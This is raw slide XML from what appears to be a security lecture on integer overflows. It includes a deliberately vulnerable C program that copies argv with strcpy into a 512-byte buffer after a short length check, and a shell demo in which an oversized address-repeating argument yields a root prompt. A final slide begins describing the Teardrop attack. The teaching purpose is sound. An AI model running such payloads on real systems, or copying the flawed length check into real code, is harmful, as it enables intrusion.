                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>short x = 0x7FFF; x++; /* x is now -32768 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>unsigned short x = 0xFFFF; x++ /* x is now 0 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>unsigned long l; short x = -2; l = x; /* l is now 4294967294 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207619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7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97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970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970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970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62" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data Sizes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013765" name="Picture 5" descr="wordsize"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="744438" y="2057401"/>
            <a:ext cx="7477225" cy="3778503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80715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37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14466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  long max;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;                                                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  max = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("max %d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %d\n", max, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt; max) {                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }                                                                                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83372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4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44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144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144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144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144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144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1446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1446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1446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14467">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14467">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1446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13442" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213443" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  `python -c 'print "A" * 32000'`                                                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> 32000                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  `python -c 'print "A" * 33000'`                                                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -32536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>integeroverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> `python -c 'print "\x58\xf4\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" * 9000'`                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>max 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -29536                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#                                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6272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3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34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134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134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134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1344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1344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1344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134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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Denial-of-service attack that exploits a bug in the fragment reassembling routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is the number of bytes copied so far </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>skb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is the total size of the datagram (after reassembly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>is the memory buffer where the datagram is being reassembled</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;fragments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>is the linked list of fragments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
